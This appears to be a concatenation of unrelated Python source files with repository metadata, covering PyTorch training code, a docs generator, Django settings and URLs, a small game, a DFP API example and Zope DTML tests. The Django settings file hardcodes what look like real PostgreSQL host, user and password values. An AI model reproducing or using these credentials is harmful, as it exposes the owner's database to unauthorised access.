boards = torch.FloatTensor(np.array(boards).astype(np.float64))
target_pis = torch.FloatTensor(np.array(pis))
target_vs = torch.FloatTensor(np.array(vs).astype(np.float64))
# predict
if args.cuda:
boards, target_pis, target_vs = boards.contiguous().cuda(), target_pis.contiguous().cuda(), target_vs.contiguous().cuda()
# compute output
out_pi, out_v = self.nnet(boards)
l_pi = self.loss_pi(target_pis, out_pi)
l_v = self.loss_v(target_vs, out_v)
total_loss = l_pi + l_v
# record loss
pi_losses.update(l_pi.item(), boards.size(0))
v_losses.update(l_v.item(), boards.size(0))
t.set_postfix(Loss_pi=pi_losses, Loss_v=v_losses)
# compute gradient and do SGD step
optimizer.zero_grad()
total_loss.backward()
optimizer.step()
for m in self.nnet.modules():
if isinstance(m, Linear_Q) or isinstance(m, Conv2d_Q):
m.clipping()
def predict(self, board):
"""
board: np array with board
"""
# preparing input
board = torch.FloatTensor(board.astype(np.float64))
if args.cuda: board = board.contiguous().cuda()
board = board.view(1, board.shape[0], board.shape[1])
self.nnet.eval()
with torch.no_grad():
pi, v = self.nnet(board)
# print('PREDICTION TIME TAKEN : {0:03f}'.format(time.time()-start))
return torch.exp(pi).data.cpu().numpy()[0], v.data.cpu().numpy()[0]
def loss_pi(self, targets, outputs):
return -torch.sum(targets * outputs) / targets.size()[0]
def loss_v(self, targets, outputs):
return torch.sum((targets - outputs.view(-1)) ** 2) / targets.size()[0]
def save_checkpoint(self, folder='checkpoint', filename='checkpoint.pth.tar'):
filepath = os.path.join(folder, filename)
if not os.path.exists(folder):
print("Checkpoint Directory does not exist! Making directory {}".format(folder))
os.mkdir(folder)
else:
print("Checkpoint Directory exists! ")
torch.save({
'state_dict': self.nnet.state_dict(),
}, filepath)
def load_checkpoint(self, folder='checkpoint', filename='checkpoint.pth.tar'):
# https://github.com/pytorch/examples/blob/master/imagenet/main.py#L98
filepath = os.path.join(folder, filename)
if not os.path.exists(filepath):
raise ("No model in path {}".format(filepath))
map_location = None if args.cuda else 'cpu'
checkpoint = torch.load(filepath, map_location=map_location)
self.nnet.load_state_dict(checkpoint['state_dict']) | [
"system97.solar@gmail.com"
] | system97.solar@gmail.com |
040c7763b82c832690147723dcb4b6f6e0d1c040 | d3c1bdc53ac82f95af085b3890b63a18fd540e38 | /source/elements/oneDAL/dalapi/generator.py | 6a40026e08ef151f9bae309647aad821e401ce72 | [
"MIT",
"CC-BY-4.0"
] | permissive | aregm/oneAPI-spec | be6f30160cc61c4ca21b100ea70578eecf53e6d3 | 20f1275eef1f43271b917c9ac28173957992efab | refs/heads/master | 2022-11-06T10:12:21.589511 | 2020-06-17T05:47:37 | 2020-06-17T05:47:37 | 274,459,461 | 0 | 0 | NOASSERTION | 2020-06-23T16:46:21 | 2020-06-23T16:46:21 | null | UTF-8 | Python | false | false | 2,376 | py | from typing import (List, Text)
from docutils.statemachine import ViewList
class RstBuilder(object):
def __init__(self, placeholder: ViewList, filename: Text, lineno: int):
self._rst_list = placeholder
self._filename = filename
self._lineno = lineno
def add_class(self, kind: str, declaration: str, namespace: str = None, level=0):
self._add_name(kind, declaration, namespace, level)
def add_typedef(self, declaration: str, namespace: str = None, level=0):
self._add_name('type', declaration, namespace, level)
def add_function(self, declaration: str, namespace: str = None, level=0):
self._add_name('function', declaration, namespace, level)
def add_param(self, tag: str, name: str, doc_text: str, level=0):
assert tag in ['param', 'tparam']
assert name
assert doc_text
formatted = self._format_text(doc_text)
self(f':{tag} {name}: {formatted}', level)
def add_member(self, declaration: str, level=0):
assert declaration
self(f'.. cpp:member:: {declaration}', level)
self.add_blank_like()
def add_doc(self, doc_text: str, level=0):
assert doc_text
self(self._format_text(doc_text), level)
self.add_blank_like()
def add_code_block(self, listing: List[Text], level=0):
assert listing is not None
self(f'.. code-block:: cpp', level)
self.add_blank_like()
for line in listing:
self(line, level + 1)
self.add_blank_like()
def add_blank_like(self):
self.add()
def add(self, string: str = '', level: int = 0):
self._rst_list.append(' ' * level * 3 + string, self._filename, self._lineno)
# TODO: Remove
def __call__(self, string: str = '', level:int = 0):
self._rst_list.append(' ' * level * 3 + string, self._filename, self._lineno)
def _add_name(self, tag: str, declaration: str, namespace: str = None, level=0):
assert declaration
if namespace:
self(f'.. cpp:namespace:: {namespace}', level)
self.add_blank_like()
self(f'.. cpp:{tag}:: {declaration}', level)
self.add_blank_like()
def _format_text(self, text):
text = text.strip()
if not (text.endswith('.') or text.endswith('|')):
text += '.'
return text
| [
"noreply@github.com"
] | noreply@github.com |
c97f23f45979a8283906bf4d5620a0ee5ddcdaea | 9a17e586d52a5be6f0c5843b04b7a51fe2be3b03 | /Kheya/settings.py | 8ad4cc150cd337bb096b4997cb77d30727609dff | [] | no_license | ARYASTARK-13/KHEYAforCovid | 6a0ffd9461411da8ff7199cc4e1bde70f5e18470 | 6f33ea7fd53aa2373444a7b3e1c6b2beeebcb9e4 | refs/heads/main | 2023-07-31T16:50:38.235520 | 2021-09-15T07:42:04 | 2021-09-15T07:42:04 | 406,656,479 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,744 | py | """
Django settings for Kheya project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = SECRET_KEY
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = ["kheya.herokuapp.com", "localhost"]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'Home',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Kheya.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Kheya.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'd3il4l6hnv042o',
'HOST': 'ec2-54-163-254-204.compute-1.amazonaws.com',
'PORT': 5432,
'USER': 'xndspipcvyqttz',
'PASSWORD': '65b128d98f699baf258c5cb8395693626a6828b43c70b797cf1d92030ab54f73',
}
}
# postgres: // xndspipcvyqttz: 65b128d98f699baf258c5cb8395693626a6828b43c70b797cf1d92030ab54f73@ec2-54-163-254-204.compute-1.amazonaws.com: 5432/d3il4l6hnv042o
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR / 'static'
STATICFILES_DIRS = [
BASE_DIR / "Home" / "static",
]
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"anirbanbiswas19999@gmail.com"
] | anirbanbiswas19999@gmail.com |
c892ca6475cd980d3c84c3c096bf2bd4ea6231d0 | f04d39dd682be3e1c6c2553a86b6fa440f973192 | /informer_vcard/urls.py | 18081a6711381b83de3c0f9a5300051d086d907b | [] | no_license | Wladislav/informer | 440ec52e206758ffa0f8d7dc5660eef32b9214a2 | 0741b72307225bc95a611db4e4ecb2ac679f994d | refs/heads/master | 2021-01-12T00:49:29.001674 | 2017-06-12T13:13:19 | 2017-06-12T13:13:19 | 78,301,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | py | from django.conf.urls import include, url
from . import views
urlpatterns = [
url(r'^vcards/$', views.vcard_list, name='vcard_index'),
url(r'^vcards/vcard_list.json/$', views.vcard_list, name='vcard_index'),
url(r'^vcards/add/$', views.vcard_change, name='vcard_add'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_adress.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_phones.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_emails.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_social.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_messeng.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_hobby.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_interest.json$', views.vcard_change, name='vcard_change'),
url(r'^vcards/[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}/change/vcard_expertise.json$', views.vcard_change, name='vcard_change'),
] | [
"photocritic72@gmail.com"
] | photocritic72@gmail.com |
edbe5ce081920cf505f9f1ee7665c0fd7b1d8f57 | 9f2a9434453857f259a9cd3087b5bf3cb85c198a | /start.py | 4afd203d1d2e581953d4a84d25cea2fa631df33d | [] | no_license | duke-thurinus/Spoopy-Game-Jam | 6cb4cd3cb7aceccd74ea44493de58dcc097ef989 | 2ce2a0fdb7a4c4b9e394cd9b761dca6dfe5ebaf2 | refs/heads/master | 2021-07-23T00:13:26.480694 | 2017-11-02T16:03:45 | 2017-11-02T16:03:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,546 | py | from random import randint
def initilize():
#navigation between systems
galaxy = { "sol" : ["eta helion", "agromega", "pi abbidon"]
,"eta helion" : ["agromega", "sol"]
,"agromega" : ["eta helion", "euridian", "sol"]
,"pi abbidon" : ["sol", "devolin"]
,"devolin" : ["pi abbidon", "euridian", "ross"]
,"euridian" : ["agromega", "acrux", "carina", "devolin"]
,"acrux" : ["euridian"]
,"carina" : ["euridian", "ross"]
,"ross" : ["devolin", "carina"]
}
#navigation within systems
systems = { "sol" : [ "mercury", "venus", "earth", "mars"
, "the asteroid belt", "jupiter", "saturn"
, "uranus", "neptune" ]
, "eta helion" : [ "eta helion 1", "eta helion 2"
, "eta helion3" ]
, "agromega" : [ "the asteroid belt", "agromega 1" ]
, "pi abbidon" : [ "pi abbidon 1", "pi abbidon 2", "pi abbidon3"
, "pi abbidon 4", "pi abbidon 5" ]
, "devolin" : [None]
, "euridian" : [ "euridian 1", "euridian 2", "euridian 3"
, "euridian 4", "euridian 4", "euridian 5"
, "euridian 6", "euridian 7" ]
, "acrux" : [ "acrux 1", "acrux 2" ]
, "carina" : [ "carina 1" ]
, "ross" : [ "ross 1", "ross 2", "ross 3", "ross 4" ]
}
#ship types
ships = { "my ship" : {"shields" : 100, "structure" : 100
, "engines" : 100, "weapons" : 40
, "sensors" : 100}
, "fighter" : {"shields" : 20, "structure" : 50
, "engines" : 120, "weapons" : 15
, "sensors" : 100}
, "corvette" : {"shields" : 50, "structure" : 75
, "engines" : 120, "weapons" : 20
, "sensors" : 100}
}
#location of enemys
ship_locs = dict()
ship_types = [ "fighter", "corvette" ]
for system in systems:
for planet in systems[system]:
ship_locs[planet] = ship_types[randint( 0, len(ship_types) - 1 )]
gamestate = { "galaxy" : galaxy , "systems" : systems, "ships" : ships
, "ship_locs" : ship_locs ,"location" : [ "sol", "" ]
}
return gamestate
| [
"henry.balch1@marist.edu"
] | henry.balch1@marist.edu |
fde24b5da2b2023a46881ed67ec027af679a60ca | 30173549f50d117d1e4341032b16109ded9b91cb | /mdb_app/urls.py | eb555bc2c46f3b416d588119a4a711ed7b09fdae | [] | no_license | shubham001shubham/shubham_rest_api_moive | 01c17190fdc41733027959703acfbd524bd6be59 | 4cce31a103f53e9dc8425711779ba209c712d659 | refs/heads/master | 2020-05-22T18:31:56.095150 | 2019-05-13T18:21:12 | 2019-05-13T18:21:12 | 186,473,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | from django.urls import path
from .views import ( MovieCreate, MovieList,
UserCreate, LoginView,ChoiceListMovie, Temp , SnippetDetail)
urlpatterns = [
path('api/movie_create/', MovieCreate.as_view(),name='movie_create'),
path('api/list/',MovieList.as_view(),name='movie_list'),
path('api/users/',UserCreate.as_view(),name='users'),
path('api/login/',LoginView.as_view(),name='login'),
path('api/movies/<int:pk>/choices/',ChoiceListMovie.as_view(),name='choice_list'),
#path('api/del/<int:pk>', snippet_detail),
path('api/serach/',Temp.as_view()),
path('api/del/<int:pk>/', SnippetDetail.as_view()),
]
| [
"pragtism@gmail.com"
] | pragtism@gmail.com |
02f22fe5f02b8df2182114217e0c398ecfda644f | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_buyout.py | 5ef4f182702e4982179b22670203e03692b7d3ff | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py |
#calss header
class _BUYOUT():
def __init__(self,):
self.name = "BUYOUT"
self.definitions = [u'(in business) a situation in which a person or group buys all the shares belonging to a company and so gets control of it: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
6f70c7b6c6841e708ef6c51dfadab270faf0d971 | aa20bb8383b81c7c644223f058a8438c006cad01 | /tests/utils.py | cedce72e6e5e7cf8f5955984e29b347ace7bcb22 | [
"MIT"
] | permissive | espenfl/parsevasp | 309f221114be8d330ee8596fa13e4bd7506f6550 | 5f7ced76172fee30a51ca4f08c36beefc72b0a61 | refs/heads/master | 2023-07-09T12:32:34.579858 | 2023-06-05T13:13:47 | 2023-06-05T13:13:47 | 219,450,686 | 0 | 0 | MIT | 2019-11-04T08:19:44 | 2019-11-04T08:19:44 | null | UTF-8 | Python | false | false | 116 | py | def isclose(a, b, rel_tol=1e-07, abs_tol=0.0):
return abs(a - b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
| [
"espen.flage-larsen@sintef.no"
] | espen.flage-larsen@sintef.no |
7909a2ccc6b0bc5bc30e9ba5b59516477b25dac6 | e3be8552aff4dbcf71e5aa165f254fd094bc048c | /examples/adspygoogle/dfp/v201311/contact_service/update_contacts.py | 3495d6abe75be43d79443f2d6930be8b07a16254 | [
"Apache-2.0"
] | permissive | caioserra/apiAdwords | cd1317f05e26edf5cad2faff40c43df96405e715 | 2419b22b1fb7a03cf98355b5793f816319e1e654 | refs/heads/master | 2020-05-05T03:37:16.605798 | 2014-02-03T17:09:39 | 2014-02-03T17:09:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,104 | py | #!/usr/bin/python
#
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example updates contact addresses.
To determine which contacts exist, run get_all_contacts.py.
Tags: ContactService.getContact
Tags: ContactService.updateContacts
"""
__author__ = 'Vincent Tsao'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
# Set the ID of the contact to get.
CONTACT_ID = 'INSERT_CONTACT_ID_HERE'
def main(client, contact_id):
# Initialize appropriate service.
contact_service = client.GetService('ContactService', version='v201311')
# Get contact.
contact = contact_service.GetContact(contact_id)[0]
if contact:
contact['address'] = '123 New Street, New York, NY, 10011'
# Update the contact on the server.
contacts = contact_service.UpdateContacts([contact])
# Display results.
if contacts:
for contact in contacts:
print (('Contact with ID \'%s\', name \'%s\', and address \'%s\' '
'was updated.')
% (contact['id'], contact['name'], contact['address']))
else:
print 'No contacts were updated.'
else:
print 'No contacts found to update.'
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client, CONTACT_ID)
| [
"cvserra@gmail.com"
] | cvserra@gmail.com |
06984e0cbe94716702eec1079b12b6cd613a7a7b | e1906617108e9026e7db30ca84fa6d2100b7286b | /Semana 1/Temperatura F° to C°.py | 2d9bc9f6b5b6f39f8947735f57a2e81fc5d0bc61 | [] | no_license | accuLucca/Curso-Introducao-a-Ciencia-da-Computacao-com-Python-Parte-1 | 96d9017c038217c3e8d8c7488eb29b7194fa9da3 | fe67deb98c04b7b102a5b3dcda2abb2c45a99d82 | refs/heads/main | 2023-03-19T19:36:29.191911 | 2021-03-23T14:08:09 | 2021-03-23T14:08:09 | 344,171,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | temperaturaFahrenheit=input("Insira uma temperatura em Fahrenheit")
temperaturaCelsius =(float(temperaturaFahrenheit)-32)* 5/ 9
print("Temperatura em Celsius:",float(temperaturaCelsius)) | [
"43175678+accuLucca@users.noreply.github.com"
] | 43175678+accuLucca@users.noreply.github.com |
6f4e4ade8178b4098daa3d93d71ad257cfd16109 | 0105f25282de5979dc5479a8b1032eaaa28f9cd3 | /main/migrations/0001_initial.py | ff2bb9fed80d12415b6066ec5a309d66302e1724 | [] | no_license | archi-max/ATM | 88460a4a883e855196287f57ca20b6b20f6e3205 | 33226da37fc624a7c7e48370239bc0473e6099bb | refs/heads/master | 2023-03-28T02:18:19.523299 | 2021-03-24T18:53:08 | 2021-03-24T18:53:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | # Generated by Django 3.1.7 on 2021-03-23 02:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('CardNumber', models.IntegerField()),
('PIN', models.PositiveSmallIntegerField()),
('CVV', models.PositiveSmallIntegerField()),
('Balance', models.PositiveSmallIntegerField()),
],
),
]
| [
"atulsyan850@gmail.com"
] | atulsyan850@gmail.com |
a1d4f595354a0c572ca7b1aa0b4325eaf227c9ce | ec21d4397a1939ac140c22eca12491c258ed6a92 | /Zope-2.9/lib/python/DocumentTemplate/tests/testDTML.py | 13621444b23ae590a45dfe79a7efeb236d8bd539 | [] | no_license | wpjunior/proled | dc9120eaa6067821c983b67836026602bbb3a211 | 1c81471295a831b0970085c44e66172a63c3a2b0 | refs/heads/master | 2016-08-08T11:59:09.748402 | 2012-04-17T07:37:43 | 2012-04-17T07:37:43 | 3,573,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,417 | py | ##############################################################################
#
# Copyright (c) 2002 Zope Corporation and Contributors. All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Document Template Tests
"""
__rcs_id__='$Id: testDTML.py 69084 2006-07-10 20:39:09Z tseaver $'
__version__='$Revision: 1.15 $'[11:-2]
import sys, os
import unittest
if __name__=='__main__':
here = os.curdir
else:
from DocumentTemplate import tests
here = tests.__path__[0]
def read_file(name):
f = open(os.path.join(here, name), 'r')
res = f.read()
f.close()
return res
from DocumentTemplate.DT_HTML import HTML, String
from ExtensionClass import Base
class D:
__allow_access_to_unprotected_subobjects__ = 1
def __init__(self, **kw):
for k, v in kw.items(): self.__dict__[k]=v
def __repr__(self): return "D(%s)" % `self.__dict__`
def d(**kw): return kw
class PukeError(Exception):
"""Exception raised in test code."""
class DTMLTests (unittest.TestCase):
doc_class = HTML
def testBatchingEtc(self):
def item(key,**kw): return (key,kw)
def item2(key,**kw): return kw
class item_class:
def __init__(self,key,**kw):
for k in kw.keys(): self.__dict__[k]=kw[k]
items=(
item( 1,dealer='Bay Chevy', make='Chevrolet',
model='Caprice', year=96),
item( 2,dealer='Bay Chevy', make='Chevrolet',
model='Nova', year=96),
item( 4,dealer='Bay Chevy', make='Chevrolet',
model='Nova', year=96),
item( 5,dealer='Bay Chevy', make='Chevrolet',
model='Nova', year=96),
item( 3,dealer='Bay Chevy', make='Chevrolet',
model='Corvett', year=96),
item( 6,dealer='Bay Chevy', make='Chevrolet',
model='Lumina', year=96),
item( 7,dealer='Bay Chevy', make='Chevrolet',
model='Lumina', year=96),
item( 8,dealer='Bay Chevy', make='Chevrolet',
model='Lumina', year=95),
item( 9,dealer='Bay Chevy', make='Chevrolet',
model='Corsica', year=96),
item(10,dealer='Bay Chevy', make='Chevrolet',
model='Corsica', year=96),
item(11,dealer='Bay Chevy', make='Toyota',
model='Camry', year=95),
item(12,dealer='Colman Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Colman Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Colman Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Colman Olds', make='Olds',
model='Cutlass', year=96),
item(12,dealer='Colman Olds', make='Olds',
model='Cutlas', year=95),
item(12,dealer='Colman Olds', make='Dodge',
model='Shadow', year=93),
item(12,dealer='Colman Olds', make='Jeep',
model='Cheroke', year=94),
item(12,dealer='Colman Olds', make='Toyota',
model='Previa', year=92),
item(12,dealer='Colman Olds', make='Toyota',
model='Celica', year=93),
item(12,dealer='Colman Olds', make='Toyota',
model='Camry', year=93),
item(12,dealer='Colman Olds', make='Honda',
model='Accord', year=94),
item(12,dealer='Colman Olds', make='Honda',
model='Accord', year=92),
item(12,dealer='Colman Olds', make='Honda',
model='Civic', year=94),
item(12,dealer='Colman Olds', make='Honda',
model='Civix', year=93),
item( 1,dealer='Spam Chev', make='Chevrolet',
model='Caprice', year=96),
item( 2,dealer='Spam Chev', make='Chevrolet',
model='Nova', year=96),
item( 4,dealer='Spam Chev', make='Chevrolet',
model='Nova', year=96),
item( 5,dealer='Spam Chev', make='Chevrolet',
model='Nova', year=96),
item( 3,dealer='Spam Chev', make='Chevrolet',
model='Corvett', year=96),
item( 6,dealer='Spam Chev', make='Chevrolet',
model='Lumina', year=96),
item( 7,dealer='Spam Chev', make='Chevrolet',
model='Lumina', year=96),
item( 8,dealer='Spam Chev', make='Chevrolet',
model='Lumina', year=95),
item( 9,dealer='Spam Chev', make='Chevrolet',
model='Corsica', year=96),
item(10,dealer='Spam Chev', make='Chevrolet',
model='Corsica', year=96),
item(11,dealer='Spam Chevy', make='Toyota',
model='Camry', year=95),
item(12,dealer='Spam Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Spam Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Spam Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Spam Olds', make='Olds',
model='Cutlass', year=96),
item(12,dealer='Spam Olds', make='Olds',
model='Cutlas', year=95),
item(12,dealer='Spam Olds', make='Dodge',
model='Shadow', year=93),
item(12,dealer='Spam Olds', make='Jeep',
model='Cheroke', year=94),
item(12,dealer='Spam Olds', make='Toyota',
model='Previa', year=92),
item(12,dealer='Spam Olds', make='Toyota',
model='Celica', year=93),
item(12,dealer='Spam Olds', make='Toyota',
model='Camry', year=93),
item(12,dealer='Spam Olds', make='Honda',
model='Accord', year=94),
item(12,dealer='Spam Olds', make='Honda',
model='Accord', year=92),
item(12,dealer='Spam Olds', make='Honda',
model='Civic', year=94),
item(12,dealer='Spam Olds', make='Honda',
model='Civix', year=93),
)
html=self.doc_class(read_file('dealers.dtml'))
res = html(inventory=items, first_ad=15)
expected = read_file('dealers.out')
self.assertEqual(res,expected)
def testSequenceSummaries(self):
def d(**kw): return kw
data=(d(name='jim', age=38),
# d(name='kak', age=40),
d(name='will', age=7),
d(name='drew', age=4),
d(name='ches', age=1),
)
html = self.doc_class('<dtml-in data mapping>'
'<dtml-if sequence-end>'
'Variable "name": '
'min=<dtml-var min-name> '
'max=<dtml-var max-name> '
'count=<dtml-var count-name> '
'total=<dtml-var total-name> '
'median=<dtml-var median-name> '
'Variable "age": '
'min=<dtml-var min-age> '
'max=<dtml-var max-age> '
'count=<dtml-var count-age> '
'total=<dtml-var total-age> '
'median=<dtml-var median-age> '
'mean=<dtml-var mean-age> '
'<dtml-let sda=standard-deviation-age>'
's.d.=<dtml-var expr="_.int(sda)">'
'</dtml-let>'
'</dtml-if sequence-end>'
'</dtml-in data>')
res = html(data=data)
expected = ('Variable "name": min=ches max=will count=4 total= '
'median=between jim and drew '
'Variable "age": min=1 max=38 count=4 total=50 '
'median=5 mean=12.5 s.d.=17')
assert res == expected, res
def testDTMLDateFormatting(self):
import DateTime
html = self.doc_class(
"<dtml-var name capitalize spacify> is "
"<dtml-var date fmt=year>/<dtml-var date "
"fmt=month>/<dtml-var date fmt=day>")
res = html(date=DateTime.DateTime("1995-12-25"),
name='christmas_day')
expected = 'Christmas day is 1995/12/25'
assert res == expected, res
def testSimpleString(self):
dt = String('%(name)s')
res = dt(name='Chris')
expected = 'Chris'
assert res == expected, res
def testStringDateFormatting(self):
import DateTime
html = String("%(name capitalize spacify)s is "
"%(date fmt=year)s/%(date fmt=month)s/%(date fmt=day)s")
res = html(date=DateTime.DateTime("2001-04-27"),
name='the_date')
expected = 'The date is 2001/4/27'
assert res == expected, res
def testSequence1(self):
html=self.doc_class(
'<dtml-in spam><dtml-in sequence-item><dtml-var sequence-item> '
'</dtml-in sequence-item></dtml-in spam>')
expected = '1 2 3 4 5 6 '
res = html(spam=[[1,2,3],[4,5,6]])
assert res == expected, res
def testSequence2(self):
html=self.doc_class(
'<dtml-in spam><dtml-in sequence-item><dtml-var sequence-item>-'
'</dtml-in sequence-item></dtml-in spam>')
expected = '1-2-3-4-5-6-'
res = html(spam=[[1,2,3],[4,5,6]])
assert res == expected, res
def testNull(self):
html=self.doc_class('<dtml-var spam fmt="$%.2f bobs your uncle" '
'null="spam%eggs!|">')
expected = '$42.00 bobs your unclespam%eggs!|'
res = html(spam=42) + html(spam=None)
assert res == expected, res
def testUrlUnquote(self):
html1 = self.doc_class(
"""
<dtml-var expr="'http%3A//www.zope.org%3Fa%3Db%20123'" fmt=url-unquote>
"""
)
html2 = self.doc_class(
"""
<dtml-var expr="'http%3A%2F%2Fwww.zope.org%3Fa%3Db+123'" fmt=url-unquote-plus>
"""
)
expected = (
"""
http://www.zope.org?a=b 123
"""
)
self.assertEqual(html1(), expected)
self.assertEqual(html2(), expected)
html1 = self.doc_class(
"""
<dtml-var expr="'http%3A//www.zope.org%3Fa%3Db%20123'" url_unquote>
"""
)
html2 = self.doc_class(
"""
<dtml-var expr="'http%3A%2F%2Fwww.zope.org%3Fa%3Db+123'" url_unquote_plus>
"""
)
expected = (
"""
http://www.zope.org?a=b 123
"""
)
self.assertEqual(html1(), expected)
self.assertEqual(html2(), expected)
def test_fmt(self):
html=self.doc_class(
"""
<dtml-var spam>
html=<dtml-var spam fmt=html-quote>
url=<dtml-var spam fmt=url-quote>
multi=<dtml-var spam fmt=multi-line>
dollars=<dtml-var spam fmt=whole-dollars>
cents=<dtml-var spam fmt=dollars-and-cents>
dollars,=<dtml-var spam fmt=dollars-with-commas>
cents,=<dtml-var spam fmt=dollars-and-cents-with-commas>""")
expected = (
'''
4200000
html=4200000
url=4200000
multi=4200000
dollars=$4200000
cents=$4200000.00
dollars,=$4,200,000
cents,=$4,200,000.00
None
html=None
url=None
multi=None
dollars=
